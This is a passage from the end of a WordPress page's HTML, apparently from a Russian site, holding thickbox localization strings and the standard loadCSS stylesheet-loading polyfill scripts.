\u041d\u0430\u0437\u0430\u0434","image":"\u0418\u0437\u043e\u0431\u0440\u0430\u0436\u0435\u043d\u0438\u0435","of":"\u0438\u0437","close":"\u0417\u0430\u043a\u0440\u044b\u0442\u044c","noiframes":"\u042d\u0442\u0430 \u0444\u0443\u043d\u043a\u0446\u0438\u044f \u0442\u0440\u0435\u0431\u0443\u0435\u0442 \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u043a\u0438 \u043f\u043b\u0430\u0432\u0430\u044e\u0449\u0438\u0445 \u0444\u0440\u0435\u0439\u043c\u043e\u0432. \u0423 \u0432\u0430\u0441 \u043e\u0442\u043a\u043b\u044e\u0447\u0435\u043d\u044b \u0442\u0435\u0433\u0438 iframe, \u043b\u0438\u0431\u043e \u0432\u0430\u0448 \u0431\u0440\u0430\u0443\u0437\u0435\u0440 \u0438\u0445 \u043d\u0435 \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u0435\u0442.","loadingAnimation":"https:\/\/ilyarm.ru\/wp-includes\/js\/thickbox\/loadingAnimation.gif"} ; /* ]]> */ </script><script type='text/javascript' src='/wp-includes/js/thickbox/thickbox.js?ver=3.1-20121105'></script><script data-cfasync='false'>/*! loadCSS. [c]2017 Filament Group, Inc. MIT License */ !function(a){ "use strict";var b=function(b,c,d){ function e(a){ return h.body?a():void setTimeout(function(){ e(a)} )} function f(){ i.addEventListener&&i.removeEventListener("load",f),i.media=d||"all"} var g,h=a.document,i=h.createElement("link");if(c)g=c;else{ var j=(h.body||h.getElementsByTagName("head")[0]).childNodes;g=j[j.length-1]} var k=h.styleSheets;i.rel="stylesheet",i.href=b,i.media="only x",e(function(){ g.parentNode.insertBefore(i,c?g:g.nextSibling)} );var l=function(a){ for(var b=i.href,c=k.length;c--;)if(k[c].href===b)return a();setTimeout(function(){ l(a)} )} ;return i.addEventListener&&i.addEventListener("load",f),i.onloadcssdefined=l,l(f),i} ;"undefined"!=typeof exports?exports.loadCSS=b:a.loadCSS=b} ("undefined"!=typeof global?global:this); /*! loadCSS rel=preload polyfill. [c]2017 Filament Group, Inc. MIT License */ !function(a){ if(a.loadCSS){ var b=loadCSS.relpreload={ };if(b.support=function(){ try{ return a.document.createElement("link").relList.supports("preload")} catch(b){ return!1} },b.poly=function(){ for(var b=a.document.getElementsByTagName("link"),c=0;c<b.length;c++){ var d=b[c];"preload"===d.rel&&"style"===d.getAttribute("as")&&(a.loadCSS(d.href,d,d.getAttribute("media")),d.rel=null)} },!b.support()){ b.poly();var c=a.setInterval(b.poly,300);a.addEventListener&&a.addEventListener("load",function(){ b.poly(),a.clearInterval(c)} ),a.attachEvent&&a.attachEvent("onload",function(){ a.clearInterval(c)} )} }} (this);</script></body></html>